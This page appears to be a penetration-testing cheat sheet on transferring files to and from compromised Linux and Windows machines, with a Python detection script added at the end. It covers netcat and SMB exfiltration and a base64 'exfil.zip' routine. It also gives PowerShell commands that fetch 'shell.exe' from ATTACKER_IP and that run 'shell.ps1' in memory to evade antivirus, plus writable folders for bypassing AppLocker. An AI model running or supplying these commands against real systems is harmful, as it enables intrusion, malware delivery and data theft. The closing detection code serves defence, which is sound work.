# File transfer

## Introduction

During a pentest, you will find interesting files that you may want to download for later analysis, or you may want to upload your tools to perform attacks. However, a restricted computer will not always give you the means to transfer files. Hence, in this section, you will see several methods to transfer files depending on the victim's OS.

## Linux

### Folders with write permissions

If you do not have write permissions to upload files on the victim's system, there are always some directories that allow everyone to write files to them:

```bash
/tmp/
/dev/shm/
```

### nc

```bash
# Receiver: listen for the file to be transferred
nc -nlvp 4444 > file
# Sender: transfer the file
nc -w 3 <DST_IP> 4444 < file
```

### scp

```bash
# Download a file (-r for a directory)
scp [-r] <USER>@<IP>:<SRC_PATH> <DST_PATH>
# Upload a file
scp <SRC_PATH> <USER>@<IP>:<DST_PATH>
```

### base64

Compress the file to get a smaller base64 output. Then, base64-encode the compressed file and copy the output to your clipboard.

```bash
# -e prompts for a password and encrypts the archive
zip -e -r exfil.zip dir_name
base64 exfil.zip > exfil.txt
```

On the other side, paste the output into a file and decode it. Finally, uncompress the archive.

```bash
base64 -d exfil.txt > exfil.zip
unzip exfil.zip
```

## Windows

### Folders with write permissions

```bash
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys\
C:\Windows\System32\spool\drivers\color\ # Allows bypassing AppLocker
C:\Windows\Tasks
C:\Windows\tracing
C:\Windows\Temp
C:\Users\Public
```

### Certutil

With certutil, you can download files onto the victim's machine. Nonetheless, take into account that the downloaded file will be analyzed by any installed AV.

```bash
certutil.exe -split -urlcache -f http://<IP>/file.exe f.ex
```

### PowerShell

With PowerShell, you can download files.

```powershell
powershell.exe Invoke-WebRequest -Uri "http://<ATTACKER_IP>/shell.exe" -OutFile notashell.exe
```

For PowerShell scripts, instead of downloading them to disk, you can load them in memory, bypassing some AVs.

```powershell
powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://<ATTACKER_IP>/shell.ps1')"
```

### SMB

With the use of [impacket](https://github.com/SecureAuthCorp/impacket) you can create your own SMB server to upload and download files from the victim's computer.

```bash
# Kali
smbserver.py -smb2support a . -username guest -password password
# Victim
net use \\<YOUR_IP>\a password /USER:guest
copy <VICTIM_FILE> \\<YOUR_IP>\a\
```
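
From the defender's side, the Windows transfer commands above leave recognizable process command lines. The following is an added example, not part of the original page: it matches those commands in constructed process-creation log lines, where the log layout, the rule names and the sample lines are all assumptions.

```python
import re

# Rule names are hypothetical; each pattern targets one transfer command from this page.
RULES = {
    "certutil_urlcache": re.compile(r"\bcertutil(?:\.exe)?\b.*[-/]urlcache\b.*https?://", re.I),
    "ps_download_to_disk": re.compile(r"\bInvoke-WebRequest\b.*-OutFile\b", re.I),
    "ps_download_in_memory": re.compile(r"\b(?:IEX|Invoke-Expression)\b.*\bDownloadString\s*\(", re.I),
    "net_use_ip_share": re.compile(r"\bnet\s+use\b.*\\\\\d{1,3}(?:\.\d{1,3}){3}\\", re.I),
}

# Constructed sample lines in an assumed "timestamp key=value ... cmdline=<rest>" layout.
SAMPLE_LOG = r'''
2024-05-01T09:00:01Z host=WS01 user=alice cmdline=certutil.exe -split -urlcache -f http://203.0.113.5/file.exe f.ex
2024-05-01T09:00:07Z host=WS01 user=alice cmdline=powershell.exe Invoke-WebRequest -Uri "http://203.0.113.5/shell.exe" -OutFile notashell.exe
2024-05-01T09:01:12Z host=WS02 user=bob cmdline=powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://203.0.113.5/shell.ps1')"
2024-05-01T09:02:30Z host=WS02 user=bob cmdline=net use \\203.0.113.5\a password /USER:guest
2024-05-01T09:03:00Z host=WS03 user=carol cmdline=certutil.exe -hashfile C:\Users\carol\setup.msi SHA256
2024-05-01T09:03:45Z host=WS03 user=carol cmdline=net use \\fileserver01\projects
'''.strip().splitlines()

def parse(line):
    """Split one log line into (fields dict, command line)."""
    head, _, cmdline = line.partition(" cmdline=")
    fields = dict(kv.split("=", 1) for kv in head.split()[1:])  # skip the timestamp
    return fields, cmdline

def scan(lines):
    """Return one alert dict per (line, matching rule)."""
    alerts = []
    for line in lines:
        fields, cmdline = parse(line)
        for name, pattern in RULES.items():
            if pattern.search(cmdline):
                alerts.append({"host": fields.get("host"), "user": fields.get("user"),
                               "rule": name, "cmdline": cmdline})
    return alerts

if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(f'{a["host"]} {a["user"]} {a["rule"]}: {a["cmdline"]}')
```

Command-line matching is only a baseline, since arguments can be reordered or obfuscated; pair it with PowerShell script block logging and egress monitoring.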

